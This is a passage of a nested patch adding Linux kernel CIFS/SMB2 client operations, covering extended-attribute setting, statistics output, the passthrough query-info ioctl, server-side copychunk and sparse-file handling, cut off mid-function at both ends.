++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	if (ea_name_len > 255)
++		return -EINVAL;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	if (ses->server->ops->query_all_EAs) {
++		if (!ea_value) {
++			rc = ses->server->ops->query_all_EAs(xid, tcon, path,
++							     ea_name, NULL, 0,
++							     cifs_sb);
++			if (rc == -ENODATA)
++				goto sea_exit;
++		} else {
++			/* If we are adding an attribute we should first check
++			 * if there will be enough space available to store
++			 * the new EA. If not, we should not add it since we
++			 * would not be able to even read the EAs back.
++			 */
++			rc = smb2_query_info_compound(xid, tcon, path,
++				      FILE_READ_EA,
++				      FILE_FULL_EA_INFORMATION,
++				      SMB2_O_INFO_FILE,
++				      CIFSMaxBufSize -
++				      MAX_SMB2_CREATE_RESPONSE_SIZE -
++				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
++				      &rsp_iov[1], &resp_buftype[1], cifs_sb);
++			if (rc == 0) {
++				rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++				used_len = le32_to_cpu(rsp->OutputBufferLength);
++			}
++			free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++			resp_buftype[1] = CIFS_NO_BUFFER;
++			memset(&rsp_iov[1], 0, sizeof(rsp_iov[1]));
++			rc = 0;
++
++			/* Use a fudge factor of 256 bytes in case we collide
++			 * with a different set_EAs command.
++			 */
++			if (CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
++			   used_len + ea_name_len + ea_value_len + 1) {
++				rc = -ENOSPC;
++				goto sea_exit;
++			}
++		}
++	}
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto sea_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	/* Set Info */
++	memset(&si_iov, 0, sizeof(si_iov));
++	rqst[1].rq_iov = si_iov;
++	rqst[1].rq_nvec = 1;
++
++	len = sizeof(*ea) + ea_name_len + ea_value_len + 1;
++	ea = kzalloc(len, GFP_KERNEL);
++	if (ea == NULL) {
++		rc = -ENOMEM;
++		goto sea_exit;
++	}
++
++	ea->ea_name_length = ea_name_len;
++	ea->ea_value_length = cpu_to_le16(ea_value_len);
++	memcpy(ea->ea_data, ea_name, ea_name_len + 1);
++	memcpy(ea->ea_data + ea_name_len + 1, ea_value, ea_value_len);
++
++	size[0] = len;
++	data[0] = ea;
++
++	rc = SMB2_set_info_init(tcon, server,
++				&rqst[1], COMPOUND_FID,
++				COMPOUND_FID, current->tgid,
++				FILE_FULL_EA_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++	if (rc)
++		goto sea_exit;
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto sea_exit;
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++	/* no need to bump num_remote_opens because handle immediately closed */
++
++ sea_exit:
++	kfree(ea);
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_set_info_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++#endif
++
++static bool
++smb2_can_echo(struct TCP_Server_Info *server)
++{
++	return server->echoes;
++}
++
++static void
++smb2_clear_stats(struct cifs_tcon *tcon)
++{
++	int i;
++
++	for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
++		atomic_set(&tcon->stats.smb2_stats.smb2_com_sent[i], 0);
++		atomic_set(&tcon->stats.smb2_stats.smb2_com_failed[i], 0);
++	}
++}
++
++static void
++smb2_dump_share_caps(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	seq_puts(m, "\n\tShare Capabilities:");
++	if (tcon->capabilities & SMB2_SHARE_CAP_DFS)
++		seq_puts(m, " DFS,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
++		seq_puts(m, " CONTINUOUS AVAILABILITY,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT)
++		seq_puts(m, " SCALEOUT,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER)
++		seq_puts(m, " CLUSTER,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_ASYMMETRIC)
++		seq_puts(m, " ASYMMETRIC,");
++	if (tcon->capabilities == 0)
++		seq_puts(m, " None");
++	if (tcon->ss_flags & SSINFO_FLAGS_ALIGNED_DEVICE)
++		seq_puts(m, " Aligned,");
++	if (tcon->ss_flags & SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE)
++		seq_puts(m, " Partition Aligned,");
++	if (tcon->ss_flags & SSINFO_FLAGS_NO_SEEK_PENALTY)
++		seq_puts(m, " SSD,");
++	if (tcon->ss_flags & SSINFO_FLAGS_TRIM_ENABLED)
++		seq_puts(m, " TRIM-support,");
++
++	seq_printf(m, "\tShare Flags: 0x%x", tcon->share_flags);
++	seq_printf(m, "\n\ttid: 0x%x", tcon->tid);
++	if (tcon->perf_sector_size)
++		seq_printf(m, "\tOptimal sector size: 0x%x",
++			   tcon->perf_sector_size);
++	seq_printf(m, "\tMaximal Access: 0x%x", tcon->maximal_access);
++}
++
++static void
++smb2_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	atomic_t *sent = tcon->stats.smb2_stats.smb2_com_sent;
++	atomic_t *failed = tcon->stats.smb2_stats.smb2_com_failed;
++
++	/*
++	 *  Can't display SMB2_NEGOTIATE, SESSION_SETUP, LOGOFF, CANCEL and ECHO
++	 *  totals (requests sent) since those SMBs are per-session not per tcon
++	 */
++	seq_printf(m, "\nBytes read: %llu  Bytes written: %llu",
++		   (long long)(tcon->bytes_read),
++		   (long long)(tcon->bytes_written));
++	seq_printf(m, "\nOpen files: %d total (local), %d open on server",
++		   atomic_read(&tcon->num_local_opens),
++		   atomic_read(&tcon->num_remote_opens));
++	seq_printf(m, "\nTreeConnects: %d total %d failed",
++		   atomic_read(&sent[SMB2_TREE_CONNECT_HE]),
++		   atomic_read(&failed[SMB2_TREE_CONNECT_HE]));
++	seq_printf(m, "\nTreeDisconnects: %d total %d failed",
++		   atomic_read(&sent[SMB2_TREE_DISCONNECT_HE]),
++		   atomic_read(&failed[SMB2_TREE_DISCONNECT_HE]));
++	seq_printf(m, "\nCreates: %d total %d failed",
++		   atomic_read(&sent[SMB2_CREATE_HE]),
++		   atomic_read(&failed[SMB2_CREATE_HE]));
++	seq_printf(m, "\nCloses: %d total %d failed",
++		   atomic_read(&sent[SMB2_CLOSE_HE]),
++		   atomic_read(&failed[SMB2_CLOSE_HE]));
++	seq_printf(m, "\nFlushes: %d total %d failed",
++		   atomic_read(&sent[SMB2_FLUSH_HE]),
++		   atomic_read(&failed[SMB2_FLUSH_HE]));
++	seq_printf(m, "\nReads: %d total %d failed",
++		   atomic_read(&sent[SMB2_READ_HE]),
++		   atomic_read(&failed[SMB2_READ_HE]));
++	seq_printf(m, "\nWrites: %d total %d failed",
++		   atomic_read(&sent[SMB2_WRITE_HE]),
++		   atomic_read(&failed[SMB2_WRITE_HE]));
++	seq_printf(m, "\nLocks: %d total %d failed",
++		   atomic_read(&sent[SMB2_LOCK_HE]),
++		   atomic_read(&failed[SMB2_LOCK_HE]));
++	seq_printf(m, "\nIOCTLs: %d total %d failed",
++		   atomic_read(&sent[SMB2_IOCTL_HE]),
++		   atomic_read(&failed[SMB2_IOCTL_HE]));
++	seq_printf(m, "\nQueryDirectories: %d total %d failed",
++		   atomic_read(&sent[SMB2_QUERY_DIRECTORY_HE]),
++		   atomic_read(&failed[SMB2_QUERY_DIRECTORY_HE]));
++	seq_printf(m, "\nChangeNotifies: %d total %d failed",
++		   atomic_read(&sent[SMB2_CHANGE_NOTIFY_HE]),
++		   atomic_read(&failed[SMB2_CHANGE_NOTIFY_HE]));
++	seq_printf(m, "\nQueryInfos: %d total %d failed",
++		   atomic_read(&sent[SMB2_QUERY_INFO_HE]),
++		   atomic_read(&failed[SMB2_QUERY_INFO_HE]));
++	seq_printf(m, "\nSetInfos: %d total %d failed",
++		   atomic_read(&sent[SMB2_SET_INFO_HE]),
++		   atomic_read(&failed[SMB2_SET_INFO_HE]));
++	seq_printf(m, "\nOplockBreaks: %d sent %d failed",
++		   atomic_read(&sent[SMB2_OPLOCK_BREAK_HE]),
++		   atomic_read(&failed[SMB2_OPLOCK_BREAK_HE]));
++}
++
++static void
++smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++
++	cfile->fid.persistent_fid = fid->persistent_fid;
++	cfile->fid.volatile_fid = fid->volatile_fid;
++	cfile->fid.access = fid->access;
++#ifdef CONFIG_CIFS_DEBUG2
++	cfile->fid.mid = fid->mid;
++#endif /* CIFS_DEBUG2 */
++	server->ops->set_oplock_level(cinode, oplock, fid->epoch,
++				      &fid->purge_cache);
++	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
++	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
++}
++
++static void
++smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++static void
++smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	struct smb2_file_network_open_info file_inf;
++	struct inode *inode;
++	int rc;
++
++	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
++		   cfile->fid.volatile_fid, &file_inf);
++	if (rc)
++		return;
++
++	inode = d_inode(cfile->dentry);
++
++	spin_lock(&inode->i_lock);
++	CIFS_I(inode)->time = jiffies;
++
++	/* Creation time should not need to be updated on close */
++	if (file_inf.LastWriteTime)
++		inode->i_mtime = cifs_NTtimeToUnix(file_inf.LastWriteTime);
++	if (file_inf.ChangeTime)
++		inode->i_ctime = cifs_NTtimeToUnix(file_inf.ChangeTime);
++	if (file_inf.LastAccessTime)
++		inode->i_atime = cifs_NTtimeToUnix(file_inf.LastAccessTime);
++
++	/*
++	 * i_blocks is not related to (i_size / i_blksize);
++	 * a 512 byte (2**9) block size is required for
++	 * calculating the number of blocks.
++	 */
++	if (le64_to_cpu(file_inf.AllocationSize) > 4096)
++		inode->i_blocks =
++			(512 - 1 + le64_to_cpu(file_inf.AllocationSize)) >> 9;
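++	/*
++	 * e.g. AllocationSize = 1048576 gives (511 + 1048576) >> 9 = 2048
++	 * blocks of 512 bytes; the "512 - 1" rounds partial blocks up.
++	 */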
++
++	/* End of file and Attributes should not have to be updated on close */
++	spin_unlock(&inode->i_lock);
++}
++
++static int
++SMB2_request_res_key(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid,
++		     struct copychunk_ioctl *pcchunk)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct resume_key_req *res_key;
++
++	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
++			FSCTL_SRV_REQUEST_RESUME_KEY, NULL, 0 /* no input */,
++			CIFSMaxBufSize, (char **)&res_key, &ret_data_len);
++
++	if (rc == -EOPNOTSUPP) {
++		pr_warn_once("Server share %s does not support copy range\n", tcon->tree_name);
++		goto req_res_key_exit;
++	} else if (rc) {
++		cifs_tcon_dbg(VFS, "refcpy ioctl error %d getting resume key\n", rc);
++		goto req_res_key_exit;
++	}
++	if (ret_data_len < sizeof(struct resume_key_req)) {
++		cifs_tcon_dbg(VFS, "Invalid refcopy resume key length\n");
++		rc = -EINVAL;
++		goto req_res_key_exit;
++	}
++	memcpy(pcchunk->SourceKey, res_key->ResumeKey, COPY_CHUNK_RES_KEY_SIZE);
++
++req_res_key_exit:
++	kfree(res_key);
++	return rc;
++}
++
++struct iqi_vars {
++	struct smb_rqst rqst[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	struct kvec close_iov[1];
++};
++
++static int
++smb2_ioctl_query_info(const unsigned int xid,
++		      struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb,
++		      __le16 *path, int is_dir,
++		      unsigned long p)
++{
++	struct iqi_vars *vars;
++	struct smb_rqst *rqst;
++	struct kvec *rsp_iov;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	char __user *arg = (char __user *)p;
++	struct smb_query_info qi;
++	struct smb_query_info __user *pqi;
++	int rc = 0;
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	struct smb2_ioctl_rsp *io_rsp = NULL;
++	void *buffer = NULL;
++	int resp_buftype[3];
++	struct cifs_open_parms oparms;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	unsigned int size[2];
++	void *data[2];
++	int create_options = is_dir ? CREATE_NOT_FILE : CREATE_NOT_DIR;
++	void (*free_req1_func)(struct smb_rqst *r);
++
++	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
++	if (vars == NULL)
++		return -ENOMEM;
++	rqst = &vars->rqst[0];
++	rsp_iov = &vars->rsp_iov[0];
++
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++
++	if (copy_from_user(&qi, arg, sizeof(struct smb_query_info))) {
++		rc = -EFAULT;
++		goto free_vars;
++	}
++	if (qi.output_buffer_length > 1024) {
++		rc = -EINVAL;
++		goto free_vars;
++	}
++
++	if (!ses || !server) {
++		rc = -EIO;
++		goto free_vars;
++	}
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	if (qi.output_buffer_length) {
++		buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length);
++		if (IS_ERR(buffer)) {
++			rc = PTR_ERR(buffer);
++			goto free_vars;
++		}
++	}
++
++	/* Open */
++	rqst[0].rq_iov = &vars->open_iov[0];
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
++
++	if (qi.flags & PASSTHRU_FSCTL) {
++		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
++		case FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS:
++			oparms.desired_access = FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | SYNCHRONIZE;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS:
++			oparms.desired_access = GENERIC_ALL;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS:
++			oparms.desired_access = GENERIC_READ;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS:
++			oparms.desired_access = GENERIC_WRITE;
++			break;
++		}
++	} else if (qi.flags & PASSTHRU_SET_INFO) {
++		oparms.desired_access = GENERIC_WRITE;
++	} else {
++		oparms.desired_access = FILE_READ_ATTRIBUTES | READ_CONTROL;
++	}
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, path);
++	if (rc)
++		goto free_output_buffer;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	/* Query */
++	if (qi.flags & PASSTHRU_FSCTL) {
++		/* Can eventually relax perm check since server enforces too */
++		if (!capable(CAP_SYS_ADMIN)) {
++			rc = -EPERM;
++			goto free_open_req;
++		}
++		rqst[1].rq_iov = &vars->io_iov[0];
++		rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++		rc = SMB2_ioctl_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
++				     qi.info_type, buffer, qi.output_buffer_length,
++				     CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++				     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++		free_req1_func = SMB2_ioctl_free;
++	} else if (qi.flags == PASSTHRU_SET_INFO) {
++		/* Can eventually relax perm check since server enforces too */
++		if (!capable(CAP_SYS_ADMIN)) {
++			rc = -EPERM;
++			goto free_open_req;
++		}
++		if (qi.output_buffer_length < 8) {
++			rc = -EINVAL;
++			goto free_open_req;
++		}
++		rqst[1].rq_iov = &vars->si_iov[0];
++		rqst[1].rq_nvec = 1;
++
++		/* MS-FSCC 2.4.13 FileEndOfFileInformation */
++		size[0] = 8;
++		data[0] = buffer;
++
++		rc = SMB2_set_info_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
++					current->tgid, FILE_END_OF_FILE_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		free_req1_func = SMB2_set_info_free;
++	} else if (qi.flags == PASSTHRU_QUERY_INFO) {
++		rqst[1].rq_iov = &vars->qi_iov[0];
++		rqst[1].rq_nvec = 1;
++
++		rc = SMB2_query_info_init(tcon, server,
++				  &rqst[1], COMPOUND_FID,
++				  COMPOUND_FID, qi.file_info_class,
++				  qi.info_type, qi.additional_information,
++				  qi.input_buffer_length,
++				  qi.output_buffer_length, buffer);
++		free_req1_func = SMB2_query_info_free;
++	} else { /* unknown flags */
++		cifs_tcon_dbg(VFS, "Invalid passthru query flags: 0x%x\n",
++			      qi.flags);
++		rc = -EINVAL;
++	}
++
++	if (rc)
++		goto free_open_req;
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++	/* Close */
++	rqst[2].rq_iov = &vars->close_iov[0];
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto free_req_1;
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++	if (rc)
++		goto out;
++
++	/* No need to bump num_remote_opens since handle immediately closed */
++	if (qi.flags & PASSTHRU_FSCTL) {
++		pqi = (struct smb_query_info __user *)arg;
++		io_rsp = (struct smb2_ioctl_rsp *)rsp_iov[1].iov_base;
++		if (le32_to_cpu(io_rsp->OutputCount) < qi.input_buffer_length)
++			qi.input_buffer_length = le32_to_cpu(io_rsp->OutputCount);
++		if (qi.input_buffer_length > 0 &&
++		    le32_to_cpu(io_rsp->OutputOffset) + qi.input_buffer_length
++		    > rsp_iov[1].iov_len) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user(&pqi->input_buffer_length,
++				 &qi.input_buffer_length,
++				 sizeof(qi.input_buffer_length))) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user((void __user *)pqi + sizeof(struct smb_query_info),
++				 (const void *)io_rsp + le32_to_cpu(io_rsp->OutputOffset),
++				 qi.input_buffer_length))
++			rc = -EFAULT;
++	} else {
++		pqi = (struct smb_query_info __user *)arg;
++		qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++		if (le32_to_cpu(qi_rsp->OutputBufferLength) < qi.input_buffer_length)
++			qi.input_buffer_length = le32_to_cpu(qi_rsp->OutputBufferLength);
++		if (copy_to_user(&pqi->input_buffer_length,
++				 &qi.input_buffer_length,
++				 sizeof(qi.input_buffer_length))) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user(pqi + 1, qi_rsp->Buffer,
++				 qi.input_buffer_length))
++			rc = -EFAULT;
++	}
++
++out:
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	SMB2_close_free(&rqst[2]);
++free_req_1:
++	free_req1_func(&rqst[1]);
++free_open_req:
++	SMB2_open_free(&rqst[0]);
++free_output_buffer:
++	kfree(buffer);
++free_vars:
++	kfree(vars);
++	return rc;
++}
++
++static ssize_t
++smb2_copychunk_range(const unsigned int xid,
++			struct cifsFileInfo *srcfile,
++			struct cifsFileInfo *trgtfile, u64 src_off,
++			u64 len, u64 dest_off)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct copychunk_ioctl *pcchunk;
++	struct copychunk_ioctl_rsp *retbuf = NULL;
++	struct cifs_tcon *tcon;
++	int chunks_copied = 0;
++	bool chunk_sizes_updated = false;
++	ssize_t bytes_written, total_bytes_written = 0;
++
++	pcchunk = kmalloc(sizeof(struct copychunk_ioctl), GFP_KERNEL);
++	if (pcchunk == NULL)
++		return -ENOMEM;
++
++	cifs_dbg(FYI, "%s: about to call request res key\n", __func__);
++	/* Request a key from the server to identify the source of the copy */
++	rc = SMB2_request_res_key(xid, tlink_tcon(srcfile->tlink),
++				srcfile->fid.persistent_fid,
++				srcfile->fid.volatile_fid, pcchunk);
++
++	/* Note: request_res_key sets res_key to NULL only if rc != 0 */
++	if (rc)
++		goto cchunk_out;
++
++	/* For now the array is only one chunk long; will make more flexible later */
++	pcchunk->ChunkCount = cpu_to_le32(1);
++	pcchunk->Reserved = 0;
++	pcchunk->Reserved2 = 0;
++
++	tcon = tlink_tcon(trgtfile->tlink);
++
++	while (len > 0) {
++		pcchunk->SourceOffset = cpu_to_le64(src_off);
++		pcchunk->TargetOffset = cpu_to_le64(dest_off);
++		pcchunk->Length =
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
++
++		/* Request server copy to target from src identified by key */
++		kfree(retbuf);
++		retbuf = NULL;
++		rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
++			trgtfile->fid.volatile_fid, FSCTL_SRV_COPYCHUNK_WRITE,
++			(char *)pcchunk, sizeof(struct copychunk_ioctl),
++			CIFSMaxBufSize, (char **)&retbuf, &ret_data_len);
++		if (rc == 0) {
++			if (ret_data_len !=
++					sizeof(struct copychunk_ioctl_rsp)) {
++				cifs_tcon_dbg(VFS, "Invalid cchunk response size\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			if (retbuf->TotalBytesWritten == 0) {
++				cifs_dbg(FYI, "no bytes copied\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			/*
++			 * Check if server claimed to write more than we asked
++			 */
++			if (le32_to_cpu(retbuf->TotalBytesWritten) >
++			    le32_to_cpu(pcchunk->Length)) {
++				cifs_tcon_dbg(VFS, "Invalid copy chunk response\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			if (le32_to_cpu(retbuf->ChunksWritten) != 1) {
++				cifs_tcon_dbg(VFS, "Invalid num chunks written\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			chunks_copied++;
++
++			bytes_written = le32_to_cpu(retbuf->TotalBytesWritten);
++			src_off += bytes_written;
++			dest_off += bytes_written;
++			len -= bytes_written;
++			total_bytes_written += bytes_written;
++
++			cifs_dbg(FYI, "Chunks %d PartialChunk %d Total %zu\n",
++				le32_to_cpu(retbuf->ChunksWritten),
++				le32_to_cpu(retbuf->ChunkBytesWritten),
++				bytes_written);
++		} else if (rc == -EINVAL) {
++			if (ret_data_len != sizeof(struct copychunk_ioctl_rsp))
++				goto cchunk_out;
++
++			cifs_dbg(FYI, "MaxChunks %d BytesChunk %d MaxCopy %d\n",
++				le32_to_cpu(retbuf->ChunksWritten),
++				le32_to_cpu(retbuf->ChunkBytesWritten),
++				le32_to_cpu(retbuf->TotalBytesWritten));
++
++			/*
++			 * Check if this is the first request using these sizes
++			 * (i.e. check whether the copy succeeded once with the
++			 * original sizes, and whether the server gave us
++			 * different sizes after we already updated the max
++			 * sizes on a previous request). If not, then why is
++			 * the server returning an error now?
++			 */
++			if ((chunks_copied != 0) || chunk_sizes_updated)
++				goto cchunk_out;
++
++			/* Check that server is not asking us to grow size */
++			if (le32_to_cpu(retbuf->ChunkBytesWritten) <
++					tcon->max_bytes_chunk)
++				tcon->max_bytes_chunk =
++					le32_to_cpu(retbuf->ChunkBytesWritten);
++			else
++				goto cchunk_out; /* server gave us bogus size */
++
++			/* No need to change MaxChunks since already set to 1 */
++			chunk_sizes_updated = true;
++		} else
++			goto cchunk_out;
++	}
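++	/*
++	 * Note: on the -EINVAL path above the server reports its preferred
++	 * limits in the SRV_COPYCHUNK_RESPONSE fields (see MS-SMB2
++	 * 2.2.32.1); we shrink tcon->max_bytes_chunk once and let the loop
++	 * retry, bailing out if the request fails again.
++	 */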
++
++cchunk_out:
++	kfree(pcchunk);
++	kfree(retbuf);
++	if (rc)
++		return rc;
++	else
++		return total_bytes_written;
++}
++
++static int
++smb2_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	return SMB2_flush(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++static unsigned int
++smb2_read_data_offset(char *buf)
++{
++	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
++
++	return rsp->DataOffset;
++}
++
++static unsigned int
++smb2_read_data_length(char *buf, bool in_remaining)
++{
++	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
++
++	if (in_remaining)
++		return le32_to_cpu(rsp->DataRemaining);
++
++	return le32_to_cpu(rsp->DataLength);
++}
++
++
++static int
++smb2_sync_read(const unsigned int xid, struct cifs_fid *pfid,
++	       struct cifs_io_parms *parms, unsigned int *bytes_read,
++	       char **buf, int *buf_type)
++{
++	parms->persistent_fid = pfid->persistent_fid;
++	parms->volatile_fid = pfid->volatile_fid;
++	return SMB2_read(xid, parms, bytes_read, buf, buf_type);
++}
++
++static int
++smb2_sync_write(const unsigned int xid, struct cifs_fid *pfid,
++		struct cifs_io_parms *parms, unsigned int *written,
++		struct kvec *iov, unsigned long nr_segs)
++{
++
++	parms->persistent_fid = pfid->persistent_fid;
++	parms->volatile_fid = pfid->volatile_fid;
++	return SMB2_write(xid, parms, written, iov, nr_segs);
++}
++
++/* Set or clear the SPARSE_FILE attribute based on value passed in setsparse */
++static bool smb2_set_sparse(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifsFileInfo *cfile, struct inode *inode, __u8 setsparse)
++{
++	struct cifsInodeInfo *cifsi;
++	int rc;
++
++	cifsi = CIFS_I(inode);
++
++	/* if file already sparse don't bother setting sparse again */
++	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && setsparse)
++		return true; /* already sparse */
++
++	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && !setsparse)
++		return true; /* already not sparse */
++
++	/*
++	 * Can't check for sparse support on share the usual way via the
++	 * FS attribute info (FILE_SUPPORTS_SPARSE_FILES) on the share
++	 * since Samba server doesn't set the flag on the share, yet
++	 * supports the set sparse FSCTL and returns sparse correctly
++	 * in the file attributes. If we fail setting sparse though we
++	 * mark that server does not support sparse files for this share
++	 * to avoid repeatedly sending the unsupported fsctl to server
++	 * if the file is repeatedly extended.
++	 */
++	if (tcon->broken_sparse_sup)
++		return false;
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid, FSCTL_SET_SPARSE,
++			&setsparse, 1, CIFSMaxBufSize, NULL, NULL);
++	if (rc) {
++		tcon->broken_sparse_sup = true;
++		cifs_dbg(FYI, "set sparse rc = %d\n", rc);
++		return false;
++	}
++
++	if (setsparse)
++		cifsi->cifsAttrs |= FILE_ATTRIBUTE_SPARSE_FILE;
++	else
++		cifsi->cifsAttrs &= (~FILE_ATTRIBUTE_SPARSE_FILE);
++
++	return true;
++}
++
++static int
++smb2_set_file_size(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, __u64 size, bool set_alloc)
++{
++	__le64 eof = cpu_to_le64(size);
++	struct inode *inode;
++
++	/*
++	 * If extending the file by more than one page, make it sparse. Many
++	 * Linux filesystems make files sparse by default when extending via
++	 * ftruncate.
++	 */
++	inode = d_inode(cfile->dentry);
++
++	if (!set_alloc && (size > inode->i_size + 8192)) {
++		__u8 set_sparse = 1;
++
++		/* whether set sparse succeeds or not, extend the file */
++		smb2_set_sparse(xid, tcon, cfile, inode, set_sparse);
++	}
++
++	return SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
